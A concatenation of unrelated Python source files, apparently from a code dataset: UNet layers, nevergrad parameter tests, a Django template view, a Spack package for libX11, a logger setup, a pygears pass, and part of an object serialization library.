"""Run forward."""
x = self.conv(x)
return x
class Down(nn.Module):
"""UNet downscaling. MaxPool with double convolution."""
def __init__(self, in_ch, out_ch):
"""Initialize.
Args:
in_ch: number of input channels
out_ch: number of output channels
"""
super(Down, self).__init__()
self.mpconv = nn.Sequential(
nn.MaxPool2d(2),
DoubleConv(in_ch, out_ch))
def forward(self, x):
"""Run forward."""
x = self.mpconv(x)
return x
class Up(nn.Module):
"""UNet upscaling."""
def __init__(self, in_ch, out_ch):
"""Initialize.
Args:
in_ch: number of input channels
out_ch: number of output channels
"""
super(Up, self).__init__()
self.in_ch = in_ch
self.out_ch = out_ch
self.up = nn.ConvTranspose2d(in_ch, in_ch // 2, 2, stride=2)
self.conv = DoubleConv(in_ch, out_ch)
def forward(self, x1, x2):
"""Run forward."""
x1 = self.up(x1)
diff_y = x2.size()[2] - x1.size()[2]
diff_x = x2.size()[3] - x1.size()[3]
x1 = F.pad(x1, (diff_x // 2, diff_x - diff_x // 2,
diff_y // 2, diff_y - diff_y // 2))
x = torch.cat([x2, x1], dim=1)
x = self.conv(x)
return x
|
the-stack_0_25271
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import pickle
import typing as tp
import pytest
import numpy as np
from nevergrad.common import errors
from . import parameter as par
def test_array_basics() -> None:
var1 = par.Array(shape=(1,))
var2 = par.Array(shape=(2, 2))
d = par.Dict(var1=var1, var2=var2, var3=12)
data = d.get_standardized_data(reference=d)
assert data.size == 5
d.set_standardized_data(np.array([1, 2, 3, 4, 5]))
assert var1.value[0] == 1
np.testing.assert_array_equal(d.value["var2"], np.array([[2, 3], [4, 5]]))
# setting value on arrays
with pytest.raises(ValueError):
var1.value = np.array([1, 2])
with pytest.raises(TypeError):
var1.value = 4 # type: ignore
var1.value = np.array([2])
representation = repr(d)
assert "Dict(var1" in representation
d.set_name("blublu")
representation = repr(d)
assert "blublu:{'var1" in representation
@pytest.mark.parametrize( # type: ignore
"param",
[
par.Dict(truc=12),
par.Tuple(),
par.Instrumentation(12),
],
)
def test_empty_parameters(param: par.Dict) -> None:
assert not param.dimension
analysis = par.helpers.analyze(param)
assert analysis.continuous
assert analysis.deterministic
assert param.descriptors.continuous
assert param.descriptors.deterministic
def _true(*args: tp.Any, **kwargs: tp.Any) -> bool: # pylint: disable=unused-argument
return True
@pytest.mark.parametrize( # type: ignore
"param",
[
par.Array(shape=(2, 2)),
par.Array(init=np.ones(3)).set_mutation(sigma=3, exponent=5),
par.Scalar(),
par.Scalar(1.0).set_mutation(exponent=2.0),
par.Dict(blublu=par.Array(shape=(2, 3)), truc=12),
par.Dict(scalar=par.Scalar(), const_array=np.array([12.0, 12.0]), const_list=[3, 3]),
par.Tuple(par.Array(shape=(2, 3)), 12),
par.Instrumentation(par.Array(shape=(2,)), nonhash=[1, 2], truc=par.Array(shape=(1, 3))),
par.Choice([par.Array(shape=(2,)), "blublu"]),
par.Choice([1, 2], repetitions=2),
par.TransitionChoice([par.Array(shape=(2,)), par.Scalar()]),
par.TransitionChoice(["a", "b", "c"], transitions=(0, 2, 1), repetitions=4),
],
)
def test_parameters_basic_features(param: par.Parameter) -> None:
check_parameter_features(param)
check_parameter_freezable(param)
# pylint: disable=too-many-statements
def check_parameter_features(param: par.Parameter) -> None:
seed = np.random.randint(2 ** 32, dtype=np.uint32)
print(f"Seeding with {seed} from reproducibility.")
np.random.seed(seed)
assert isinstance(param.name, str)
# assert param._random_state is None # TODO no more true because of layers :s
assert param.generation == 0
child = param.spawn_child()
assert isinstance(child, type(param))
assert child.heritage["lineage"] == param.uid
assert child.generation == 1
assert not np.any(param.get_standardized_data(reference=param))
assert not np.any(child.get_standardized_data(reference=child))
assert not np.any(child.get_standardized_data(reference=param))
assert child.name == param.name
assert param._random_state is not None
assert child.random_state is param.random_state
assert child.uid != param.uid
assert child.parents_uids == [param.uid]
mutable = True
try:
child.mutate()
except errors.UnsupportedParameterOperationError:
mutable = False
else:
assert np.any(child.get_standardized_data(reference=param))
param.set_name("blublu")
child_hash = param.spawn_child()
assert child_hash.name == "blublu"
param.value = child.value
try:
assert param.get_value_hash() == child.get_value_hash()
except AssertionError:
# with approximations, value hash may return something slightly different
# so let's try a relaxed version
param2 = param.spawn_child()
param2.value = child.value
assert param2.get_value_hash() == param.get_value_hash()
if isinstance(param, par.Data):
assert param.get_value_hash() != child_hash.get_value_hash()
child_hash.value = param.value
np.testing.assert_almost_equal(
param.get_standardized_data(reference=child), np.zeros(param.dimension) # type: ignore
)
if mutable:
param.recombine(child, child)
param.recombine() # empty should work, for simplicity's sake
# constraints
param.register_cheap_constraint(_true)
with pytest.warns(UserWarning):
param.register_cheap_constraint(lambda *args, **kwargs: False)
child2 = param.spawn_child(param.value) # just checking new_value
assert child.satisfies_constraints()
assert not param.satisfies_constraints()
assert not child2.satisfies_constraints()
# array to and from with hash
data = param.get_standardized_data(reference=child2)
param.set_standardized_data(data, reference=child2)
np.testing.assert_array_almost_equal(param.get_standardized_data(reference=child2), data)
# picklable
string = pickle.dumps(child)
pickle.loads(string)
# sampling
samp_param = param.sample()
assert samp_param.uid == samp_param.heritage["lineage"]
# set descriptor
assert param.descriptors.deterministic_function
assert param.function.deterministic
param.descriptors.deterministic_function = False
assert not param.descriptors.deterministic_function
assert not param.function.deterministic
#
assert param.descriptors.non_proxy_function
assert not param.function.proxy
param.descriptors.non_proxy_function = False
assert not param.descriptors.non_proxy_function
assert param.function.proxy
#
descr_child = param.spawn_child()
assert not descr_child.descriptors.deterministic_function
assert not descr_child.descriptors.non_proxy_function
def check_parameter_freezable(param: par.Parameter) -> None:
param.freeze()
value = param.value
data = param.get_standardized_data(reference=param)
child = param.spawn_child()
child.mutate()
child.recombine(param)
with pytest.raises(RuntimeError):
param.value = value
with pytest.raises(RuntimeError):
param.set_standardized_data(data)
child.set_standardized_data(data, reference=param)
with pytest.raises(RuntimeError):
param.recombine(child)
@pytest.mark.parametrize( # type: ignore
"param,name",
[
(par.Array(shape=(2, 2)), "Array{(2,2)}"),
(par.Tuple(12), "Tuple(12)"),
(par.Dict(constant=12), "Dict(constant=12)"),
(par.Scalar(), "Scalar[sigma=Scalar{exp=2.03}]"),
(
par.Log(lower=3.2, upper=12.0, exponent=1.5),
"Log{Cl(2.868682869489701,6.128533874054364,b),exp=1.50}",
),
(par.Scalar().set_integer_casting(), "Scalar{Int}[sigma=Scalar{exp=2.03}]"),
(
par.Instrumentation(par.Array(shape=(2,)), string="blublu", truc="plop"),
"Instrumentation(Tuple(Array{(2,)}),Dict(string=blublu,truc=plop))",
),
(par.Choice([1, 12]), "Choice(choices=Tuple(1,12),indices=Array{(1,2),SoftmaxSampling})"),
(
par.Choice([1, 12], deterministic=True),
"Choice(choices=Tuple(1,12),indices=Array{(1,2),SoftmaxSampling{det}})",
),
(
par.TransitionChoice([1, 12]),
"TransitionChoice(choices=Tuple(1,12),indices=Array{Cd(0,2),Add,Int},transitions=[1. 1.])",
),
],
)
def test_parameter_names(param: par.Parameter, name: str) -> None:
assert param.name == name
@pytest.mark.parametrize( # type: ignore
"param,continuous,deterministic,ordered",
[
(par.Array(shape=(2, 2)), True, True, True),
(par.Choice([True, False]), True, False, False),
(par.Choice([True, False], deterministic=True), False, True, False),
(par.Choice([True, par.Scalar().set_integer_casting()]), False, False, False),
(
par.Dict(constant=12, data=par.Scalar().set_integer_casting()),
False,
True,
True,
),
],
)
def test_parameter_analysis(
param: par.Parameter, continuous: bool, deterministic: bool, ordered: bool
) -> None:
analysis = par.helpers.analyze(param)
assert analysis.continuous == continuous
assert analysis.deterministic == deterministic
assert analysis.ordered == ordered
assert param.descriptors.continuous == continuous
assert param.descriptors.deterministic == deterministic
assert param.descriptors.ordered == ordered
def test_instrumentation() -> None:
inst = par.Instrumentation(par.Array(shape=(2,)), string="blublu", truc=par.Array(shape=(1, 3)))
inst.mutate()
assert len(inst.args) == 1
assert len(inst.kwargs) == 2
scal = par.Scalar()
with pytest.raises(ValueError):
inst = par.Instrumentation(scal, blublu=scal)
assert set(inst[1]) == {"string", "truc"} # type: ignore
def test_scalar_and_mutable_sigma() -> None:
param = par.Scalar(init=1.0, mutable_sigma=True).set_mutation(exponent=2.0, sigma=5)
assert param.value == 1
data = param.get_standardized_data(reference=param)
assert data[0] == 0.0
param.set_standardized_data(np.array([-0.2]))
assert param.value == 0.5
assert param.sigma.value == pytest.approx(5)
param.mutate()
assert param.sigma.value != pytest.approx(5)
param.set_integer_casting()
assert isinstance(param.value, int)
def test_array_recombination() -> None:
param = par.Tuple(par.Scalar(1.0, mutable_sigma=True).set_mutation(sigma=5))
param2 = par.Tuple(par.Scalar(1.0, mutable_sigma=True).set_mutation(sigma=1))
param.value = (1,)
param2.value = (3,)
param.recombine(param2)
assert param.value[0] == 2.0
param2.set_standardized_data(
(param.get_standardized_data(reference=param2) + param2.get_standardized_data(reference=param2)) / 2
)
assert param2.value[0] == 2.5
def _false(value: tp.Any) -> bool: # pylint: disable=unused-argument
return False
def test_endogeneous_constraint() -> None:
param = par.Scalar(1.0, mutable_sigma=True)
param.sigma.register_cheap_constraint(_false)
assert not param.satisfies_constraints()
def _return_val(val: float) -> float: # pylint: disable=unused-argument
return val
@pytest.mark.parametrize("val,expected", [(1.0, True), (0.0, True), (-1.0, False)]) # type: ignore
def test_float_constraint(val: float, expected: bool) -> None:
param = par.Scalar(val, mutable_sigma=True)
param.register_cheap_constraint(_return_val)
assert param.satisfies_constraints() is expected
@pytest.mark.parametrize("name", ["clipping", "arctan", "tanh", "constraint", "bouncing"]) # type: ignore
def test_constraints(name: str) -> None:
param = par.Scalar(12.0).set_mutation(sigma=2).set_bounds(method=name, lower=-100, upper=100)
param.set_standardized_data(param.get_standardized_data(reference=param))
np.testing.assert_approx_equal(param.value, 12, err_msg="Back and forth did not work")
param.set_standardized_data(np.array([100000.0]))
if param.satisfies_constraints():
# bouncing works differently from others
np.testing.assert_approx_equal(
param.value,
100 if name != "bouncing" else -100,
significant=3,
err_msg="Constraining did not work",
)
@pytest.mark.parametrize( # type: ignore
"param,expected",
[
(par.Scalar(), False),
(par.Scalar(lower=-1000, upper=1000).set_mutation(sigma=1), True),
(par.Scalar(lower=-1000, upper=1000, init=0).set_mutation(sigma=1), False),
(par.Scalar().set_bounds(-1000, 1000, full_range_sampling=True), True),
],
)
def test_scalar_sampling(param: par.Scalar, expected: bool) -> None:
spawned_vals = [np.abs(param.spawn_child().value) for _ in range(10)]
sampled_vals = [np.abs(param.sample().value) for _ in range(10)]
assert not np.any(np.array(spawned_vals) > 100)
assert np.any(np.array(sampled_vals) > 100) == expected
def test_log() -> None:
with pytest.warns(errors.NevergradRuntimeWarning) as record:
log = par.Log(lower=0.001, upper=0.1, init=0.02, exponent=2.0)
assert log.value == pytest.approx(0.02)
assert not record, [x.message for x in record] # TODO readd
par.Log(lower=0.001, upper=0.1, init=0.01, exponent=10.0)
assert len(record) == 1, [x.message for x in record]
# automatic
log = par.Log(lower=0.001, upper=0.1)
assert log.value == pytest.approx(0.01)
log.set_standardized_data([2.999])
np.testing.assert_almost_equal(log.value, 0.09992, decimal=5)
def test_bounded_scalar() -> None:
scalar = par.Scalar(lower=0.0, upper=0.6)
np.testing.assert_almost_equal(scalar.sigma.value, 0.1)
np.testing.assert_almost_equal(scalar.value, 0.3)
# partial
with pytest.raises(ValueError):
scalar = par.Scalar(lower=1.0)
def test_ordered_choice() -> None:
choice = par.TransitionChoice([0, 1, 2, 3], transitions=[-1000000, 10])
assert len(choice) == 4
assert choice.value == 2
choice.value = 1
assert choice.value == 1
choice.mutate()
assert choice.value in [0, 2]
assert choice.get_standardized_data(reference=choice).size
choice.set_standardized_data(np.array([12.0]))
assert choice.value == 3
def test_ordered_choice_weird_values() -> None:
choice = par.TransitionChoice([0, np.nan, np.inf])
choice.value = np.nan
assert choice.value is np.nan
choice.value = np.inf
assert choice.value == np.inf
def test_choice_repetitions() -> None:
choice = par.Choice([0, 1, 2, 3], repetitions=2)
choice.random_state.seed(12)
assert len(choice) == 4
assert choice.value == (0, 2)
choice.value = (3, 1)
assert choice.indices.value.tolist() == [3, 1]
choice.mutate()
def test_transition_choice_repetitions() -> None:
choice = par.TransitionChoice([0, 1, 2, 3], repetitions=2)
choice.random_state.seed(12)
assert len(choice) == 4
assert choice.value == (2, 2)
choice.value = (3, 1)
np.testing.assert_almost_equal(choice.indices.value, [3, 1], decimal=3)
choice.mutate()
assert choice.value == (3, 0)
def test_array_bounded_initialization() -> None:
array = par.Array(shape=(1,), lower=-1)
assert array.value[0] == 0
assert array.bounds == (-1, None) # type: ignore
assert array.sigma.value == 1.0
array = par.Array(shape=(1,), lower=-0.5, upper=2.5)
assert array.value[0] == 1
assert array.bounds == (-0.5, 2.5) # type: ignore
assert array.sigma.value == 0.5
@pytest.mark.parametrize("method", ["clipping", "arctan", "tanh", "constraint", "bouncing"]) # type: ignore
@pytest.mark.parametrize("exponent", [2.0, None]) # type: ignore
@pytest.mark.parametrize("sigma", [1.0, 1000, 0.001]) # type: ignore
def test_array_sampling(method: str, exponent: tp.Optional[float], sigma: float) -> None:
mbound = 10000.0
param = par.Array(init=2 * np.ones((2, 3))).set_bounds(
[1.0, 1, 1], [mbound] * 3, method=method, full_range_sampling=True
)
param.set_mutation(exponent=exponent, sigma=sigma)
new_param = param.sample()
val = new_param.value
assert np.any(np.abs(val) > 10)
assert np.all(val <= mbound)
assert np.all(val >= 1)
def test_parenthood() -> None:
param = par.Instrumentation(par.Scalar(init=1.0, mutable_sigma=True).set_mutation(exponent=2.0, sigma=5))
sigma_uid = param[0][0].sigma.uid # type: ignore
param_samp = param.sample()
param_spawn = param.spawn_child()
assert param_samp[0][0].sigma.parents_uids == [] # type: ignore
assert param_spawn[0][0].sigma.parents_uids == [sigma_uid] # type: ignore
def test_random_state_initialization() -> None:
param = par.Dict(x=par.Choice(4), y=par.Choice(10))
param.value # pylint: disable=pointless-statement
assert param["x"].random_state is param["y"].random_state
|
the-stack_0_25272
|
# -*- coding: utf-8 -*-
import urls
from django.core.exceptions import ImproperlyConfigured
from django.views.generic import TemplateView
from django.conf import settings
class StaticPageView(TemplateView):
"""
This view extends (monkey-patches, more precisely),
the TemplateResponseMixin's get_template_names,
in order to intercept the currently selected language code
and modify the template_name.
It is assumed that the templates will go under dedicated directory,
named after the language codes, i.e.:
- en
- footer_chi_siamo.html
- contatti.html
- it
- footer_chi_siamo.html
- contatti.html
"""
template_language = None
page_url_name = None
page_label = {}
def get_template_names(self):
"""
Returns a list of template names to be used for the request. Must return
a list. May not be called if render_to_response is overridden.
"""
if self.template_language is None:
if self.request.LANGUAGE_CODE is None:
raise ImproperlyConfigured(
"I18NTemplateView requires either a definition of "
"'template_language' or an implementation of 'get_template_language()'")
else:
self.template_language = self.request.LANGUAGE_CODE
configured_languages = dict(settings.LANGUAGES).keys()
if self.template_language is None:
raise ImproperlyConfigured(
"I18NTemplateView requires 'template_language' "
"to be in one of the languages specified in the settings")
if self.template_name is None:
raise ImproperlyConfigured(
"I18NTemplateView requires either a definition of "
"'template_name' or an implementation of 'get_template_names()'")
return ["{0}/{1}".format(self.template_language, self.template_name)]
def get_context_data(self, **kwargs):
context = super(StaticPageView, self).get_context_data(**kwargs)
context['page_label'] = self.page_label
context['page_url_name'] = self.page_url_name
return context
class CooperazioneView(StaticPageView):
"""
This view extends the I18NTemplateView, and is used to show
the pages under cooperaizone_italiana.
Basically, it injects a cooperazione_pages key, within the context.
The cooperazione_pages is imported from the urls module (in this pages package)
"""
def get_context_data(self, **kwargs):
context = super(CooperazioneView, self).get_context_data(**kwargs)
context['cooperazione_pages'] = urls.cooperazione_pages
return context
|
the-stack_0_25275
|
"""
Content under Creative Commons Attribution license CC-BY 4.0,
code under MIT license (c)2018 Sergio Rojas ([email protected])
http://en.wikipedia.org/wiki/MIT_License
http://creativecommons.org/licenses/by/4.0/
Created on april, 2018
Last Modified on: may 15, 2018
This program illustrates how to write data to a file. If the file exist
it will be overwritten and the the existing data will be lost
"""
thefile = 'chap04_write_test_file.txt'
colsLabel = ['x', 'x*x', 'x*x*x']
values = [ [1, 1, 1], [2, 4, 8] ]
try:
with open(thefile, 'wt') as openedFile:
for cols in colsLabel:
openedFile.write('{0} '.format(cols))
openedFile.write('\n')
for cols in values:
for rows in cols:
openedFile.write('{0} '.format(rows))
openedFile.write('\n')
except Exception as errorCapturado:
print("\t The following error happened when opening the file")
print("\t *** {0} ***".format(type(errorCapturado)))
# The next instruction shows that the opened file was closed
# This line should be deleted
# print(openedFile.closed)
|
the-stack_0_25276
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libx11(AutotoolsPackage, XorgPackage):
"""libX11 - Core X11 protocol client library."""
homepage = "https://www.x.org/"
xorg_mirror_path = "lib/libX11-1.6.7.tar.gz"
version('1.7.0', sha256='c48ec61785ec68fc6a9a6aca0a9578393414fe2562e3cc9cca30234345c7b6ac')
version('1.6.7', sha256='f62ab88c2a87b55e1dc338726a55bb6ed8048084fe6a3294a7ae324ca45159d1')
version('1.6.5', sha256='3abce972ba62620611fab5b404dafb852da3da54e7c287831c30863011d28fb3')
version('1.6.3', sha256='0b03b9d22f4c9e59b4ba498f294e297f013cae27050dfa0f3496640200db5376')
depends_on('[email protected]:')
depends_on('[email protected]:', when='@1.7.0:')
depends_on('[email protected]:')
depends_on('xextproto')
depends_on('xtrans')
depends_on('kbproto')
depends_on('inputproto')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
depends_on('perl', type='build')
def configure_args(self):
config_args = []
# -Werror flags are not properly interpreted by the NVIDIA compiler
if self.spec.satisfies('%nvhpc@:20.11'):
config_args.append('--disable-selective-werror')
return config_args
def setup_dependent_build_environment(self, env, dependent_spec):
env.prepend_path('XLOCALEDIR', self.prefix.share.X11.locale)
def setup_dependent_run_environment(self, env, dependent_spec):
env.prepend_path('XLOCALEDIR', self.prefix.share.X11.locale)
@property
def libs(self):
for dir in ['lib64', 'lib']:
libs = find_libraries('libX11', join_path(self.prefix, dir),
shared=True, recursive=False)
if libs:
return libs
return None
|
the-stack_0_25279
|
import datetime
import logging
import daiquiri
from constants import modelconstants
def get_logger(name):
daiquiri.setup(
level=logging.DEBUG,
outputs=(
daiquiri.output.File(modelconstants.LOG_FILE_PATH, level=logging.DEBUG),
daiquiri.output.TimedRotatingFile(
modelconstants.LOG_FILE_PATH,
level=logging.DEBUG,
interval=datetime.timedelta(weeks=356))
)
)
logger = daiquiri.getLogger(name)
return logger
|
the-stack_0_25282
|
from ..ir_utils import HDLVisitor, ir, res_false, res_true
from pygears.typing import Bool
class CycleDone(HDLVisitor):
def LoopBlock(self, node):
if '_state' in self.ctx.scope:
node.stmts.insert(
0,
ir.AssignValue(target=self.ctx.ref('cycle_done', ctx='store'),
val=self.ctx.ref('_state', ctx='en')))
else:
node.stmts.insert(
0,
ir.AssignValue(target=self.ctx.ref('cycle_done', ctx='store'),
val=res_false))
node.stmts.append(
ir.AssignValue(target=self.ctx.ref('cycle_done', ctx='store'),
val=res_true))
def infer_cycle_done(block, ctx):
ctx.scope['cycle_done'] = ir.Variable('cycle_done', Bool)
block.stmts.insert(
0, ir.AssignValue(ctx.ref('cycle_done', 'store'), res_true))
CycleDone(ctx).visit(block)
return block
|
the-stack_0_25284
|
'''serialize/deserialize almost any kind of python object'''
# TODO:
# memoryview -- not possible? .tolist or .tobytes will return the data, but i haven't found a way to get the object that it references
# bytearray -- use str() to get the data
# operator.methodcaller -- can be done by using an object with __getattr__ for the name, and grabbing the method's *args, **kwds for the default args. hopefully doing this doesn't influence state...
# TODO: add a decorator that can transform anything into an object that will pass an instance of self
# to serialization service
import sys
if sys.version_info.major < 3:
import builtins, types
else:
import builtins, types
__all__ = ['caller', 'pack', 'unpack', 'loads', 'dumps']
VERSION = '0.7'
## FIXME: none of these are enabled due to their hackiness, search for XXX
# attribute[ignore=list of fu type names] -- ignore serializing/deserializing these types
# attribute[globals=dict] -- use the provided dict as the globals for deserialized objects
# attribute[exclude=list of var names] -- ignore serializing/deserializing these specific names
# attribute[local=list of module names] -- use the local versions of these modules
# attribute[recurse={type name : [list of types]}] -- only recurse into these types from this type
# attribute[norecurse={type name : [list of types]}] -- don't recurse into these types from this type
########
class package:
'''
This class is responsible for exposing the interface used to marshal/unmarshal
an object. The reason for the class is to close around the internals of this
module hiding the functionality that is used for serialization. The only
interfaces that are exposed are the pack() and unpack() classmethods.
'''
@classmethod
def pack(cls, object, **attributes):
'''convert any python object into a packable format'''
st = cls.stash()
id = st.store(object, **attributes)
return VERSION, id, st.packed()
@classmethod
def unpack(cls, data, **attributes):
'''unpack data into a real python object'''
ver, id, data = data
if ver != VERSION:
raise AssertionError('fu.package.unpack : invalid version %s != %s'%(ver, VERSION))
st = cls.stash()
st.unpack(data)
return st.fetch(id, **attributes)
### stuff that's hidden within this namespace
class cache(object):
'''
This class is used to handle the registration of the different serializers
and deserializers for a python type/constant. The registration of the
different implementations is done via decorator at which point one can
use the .by*() classmethods to identify the handler for their type or
instance.
'''
class registration:
id, const, type = {}, {}, {}
@staticmethod
def hash(data):
agg = 5381
for item in iter(data):
agg = (((agg<<5) + agg) ^ ord(item)) & 0xffffffff
return agg
## registration of a cls into cache
@classmethod
def register(cls, definition):
id = cls.registration.hash(definition.__name__)
#id = definition.__name__
if id in cls.registration.id:
raise KeyError("Duplicate id %x in cache"% id)
cls.registration.id[id] = definition
definition.id = id
return definition
@classmethod
def register_type(cls, definition):
'''registers the definition with the specified builtin type'''
type = definition.getclass()
if type in cls.registration.type:
raise KeyError("Duplicate type %r in cache"% type)
definition = cls.register(definition)
cls.registration.type[type] = definition
return definition
@classmethod
def register_const(cls, definition):
const = definition.getclass()
if const in cls.registration.const:
raise KeyError("Duplicate constant %r in cache"% const)
definition = cls.register(definition)
cls.registration.const[const] = definition
return definition
## determining a registered cls from various types
@classmethod
def byid(cls, id):
'''search through globastate.id for a definition'''
return cls.registration.id[id]
@classmethod
def byclass(cls, type):
'''search through registration.type for a definition'''
return cls.registration.type[type]
@classmethod
def byconst(cls, const):
'''search through registration.const for a definition'''
result = cls.registration.const[const]
if result.getclass() is not const:
raise KeyError(const)
return result
@classmethod
def byinstance(cls, instance):
'''iterate through all registered definitions to determine which one can work for serialization/deserialization'''
global package, object_, module_
type, object, module = types.TypeType if sys.version_info.major < 3 else builtins.type, types.ObjectType if sys.version_info.major < 3 else builtins.object, types.ModuleType
t = type(instance)
# any constant
try:
return package.cache.byconst(instance)
except (KeyError, TypeError):
pass
# special types
if t is module and instance is not module:
# XXX: implement binary modules
if hasattr(instance, '__file__'):
if instance.__file__.endswith('.pyd'):
raise NotImplementedError('Binary modules are un-supported')
return module_
return module_local
# by type
try:
return package.cache.byclass(t)
except (KeyError, TypeError):
pass
# builtins for known-modules that can be copied from
if t == builtin_.getclass():
if instance.__module__ is None:
#return incomplete # XXX
raise KeyError(instance, 'Unable to determine module name from builtin method')
return builtin_
# catch-all object
if hasattr(instance, '__dict__') or hasattr(instance, '__slots__'): # is this an okay assumption?
return object_
# FIXME: if it follows the pickle protocol..
if hasattr(instance, '__getstate__'):
raise NotImplementedError('Pickle protocol for type %r is unimplemented'% instance)
pickle.loads(pickle.dumps(instance))
return incomplete
raise KeyError(instance)
class stash(builtins.object):
'''
This class is used to recursively serialize/deserialize an instance or
type. It is temporarily constructed and will use the cache to identify
how to serialize/deserialize the data that is passed to it. Once all
the references are processed, a tuple of the objects and constants are
then returned. This can then be re-packed into a bytestream which can
then be transported wherever the user needs it.
'''
def __init__(self):
# cache for .fetch
self.fetch_cache = {}
self.store_cache = builtins.set()
# caches for .store
self.cons_data = {}
self.inst_data = {}
@staticmethod
def clsbyid(item): return package.cache.byid(item)
@staticmethod
def clsbyinstance(item): return package.cache.byinstance(item)
# FIXME: should prolly implement __str__, __unicode__, and __repr__
def __repr__(self):
cons = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.cons_data.items()]
inst = [(k, (self.clsbyid(clsid).__name__, v)) for k, (clsid, v) in self.inst_data.items()]
return "<class '%s'> %s"%(self.__class__.__name__, builtins.repr({key : item for key, item in cons}))
## serializing/deserializing entire state
def packed(self):
return self.cons_data, self.inst_data
def unpack(self, data):
cons, inst = data
self.cons_data.clear()
self.inst_data.clear()
self.cons_data.update(cons)
self.inst_data.update(inst)
return True
## packing/unpacking of id's
def pack_references(self, data, **attributes):
'''converts object data into reference id's'''
if data.__class__ is ().__class__:
return ().__class__(self.store(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.store(k, **attributes) : self.store(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
# a list contains multiple packed objects
return [self.pack_references(item, **attributes) for item in data]
return data
def unpack_references(self, data, **attributes):
'''converts packed references into objects'''
if data.__class__ is ().__class__:
return ().__class__(self.fetch(item, **attributes) for item in data)
elif data.__class__ is {}.__class__:
return {self.fetch(k, **attributes) : self.fetch(v, **attributes) for k, v in data.items()}
elif data.__class__ is [].__class__:
return [self.unpack_references(item, **attributes) for item in data]
return data
def identify(self, object):
return id(object)
# unique id generator for .identify if id is not guaranteed to be unique (python 2.6?)
#if not hasattr(self, '__identity'):
# self.__identity = []
#if object in self.__identity:
# return self.__identity.index(object)
#self.__identity.append(object)
#return self.identify(object)
def __getitem__(self, name):
return self.identify(name)
### stashing/fetching of objects
def store(self, object, **attributes):
identity = self.identify(object)
if identity in self.store_cache:
return identity
cls = self.clsbyinstance(object)
if False: # XXX: if we want to make the module and name part of the protocol. (for assistance with attributes)
# get naming info
modulename, name = getattr(object, '__module__', None), getattr(object, '__name__', None)
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# store constructor info
data = cls.p_constructor(object, **attributes)
self.store_cache.add(identity)
data = self.pack_references(data, **attributes)
self.cons_data[identity] = cls.id, data
# self.cons_data[identity] = cls.id, (modulename, name), data # XXX: for attributes by name
# recurse into instance data
data = cls.p_instance(object, **attributes)
data = self.pack_references(data, **attributes)
self.inst_data[identity] = cls.id, data
return identity
def fetch(self, identity, **attributes):
if identity in self.fetch_cache:
return self.fetch_cache[identity]
# unpack constructor
# _, (modulename, name), data = self.cons_data[identity] # XXX: for attributes by name
_, data = self.cons_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
if False: # XXX: attributes
# naming info
fullname = ('%s.%s'% (modulename, name)) if modulename else name
# attribute[ignore=list of types, exclude=list of names]
if (cls.__name__ in builtins.set(attributes.get('ignore', ()))) or \
(fullname in builtins.set(attributes.get('exclude', ()))):
cls = incomplete
instance = incomplete.new()
self.fetch_cache[identity] = instance
return instance
# attribute[local=list of names]
if name in builtins.set(attributes.get('local', ())):
cls = module
# create an instance of packed object
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
# update instance with packed attributes
_, data = self.inst_data[identity]
cls, data = self.clsbyid(_), self.unpack_references(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError('%s.fetch(%d) : constructed instance is different from updated instance'% (builtins.object.__repr__(self), identity))
return instance
class __type__(builtins.object):
'''
This base class is used to help register an instance of a type. Once
identifying the type of an instance, the class will be responsible for
returning any attributes that are necessary to re-construct or
re-instantiate that object.
'''
@classmethod
def getclass(cls, *args, **kwds):
'''
This returns the type to search for. The type is snuck from an instance
by using the __class__ attribute.
'''
raise NotImplementedError(cls)
@classmethod
def new(cls):
'''
This method returns an instance of the type that the class is supposed
to be responsible for.
'''
return cls.getclass()
@classmethod
def repr(cls, object):
'''
This method will output an instance in a readable manner.
'''
return repr(object)
@classmethod
def p_constructor(cls, object, **attributes):
'''
This method will extract any attributees that are required to create
the initial instance of a type. The necessary attributes are then
returned as a tuple.
'''
return ()
@classmethod
def p_instance(cls, object, **attributes):
'''
This method will extract any attributes that will be updated after
the type has been instantiated. It is prudent to note that these
attributes are not necessary to construct the object, only that the
object's users expect these fields to be set. The necessary attributes
are then returned as a tuple.
'''
raise NotImplementedError(cls)
@classmethod
def u_constructor(cls, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and use it to re-instantiate the specified type. The tuple in data is
the same as the tuple returned by the p_constructor() classmethod. The
method will return the properly instantiated type.
'''
raise NotImplementedError(cls)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''
This method will take the tuple that is provided by the data parameter,
and do whatever is necessary to update the instance parameter with it.
This can include (but is not limited to), assigning any attributes with
the setattr() keyword, calling any methods to update the state, etc.
The tuple in data corresponds to the tuple returned by the p_instance()
classmethod. The method will then return the instance that was updated.
'''
return instance
@package.cache.register_type
class incomplete(__type__):
'''just a general type for incomplete objects'''
class partialinstance(object):
__name__ = '--incomplete--'
def __getattr__(self, attribute):
message = 'unable to access attribute "%s" from incomplete type "%s"'
raise Exception(message% (attribute, self.__name__))
def __call__(self, *args, **kwds):
message = 'unable to call incomplete type "%s"'
raise Exception(message% (self.__name__))
def __repr__(self):
return "%s %s"%( self.__class__, self.__name__ )
@classmethod
def getclass(cls):
return cls.partialinstance
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@classmethod
def p_instance(cls, object, **attributes):
return ()
### constants
if 'constants':
class __constant(__type__):
'''
This parent class is used to assist defining a constant. A constant
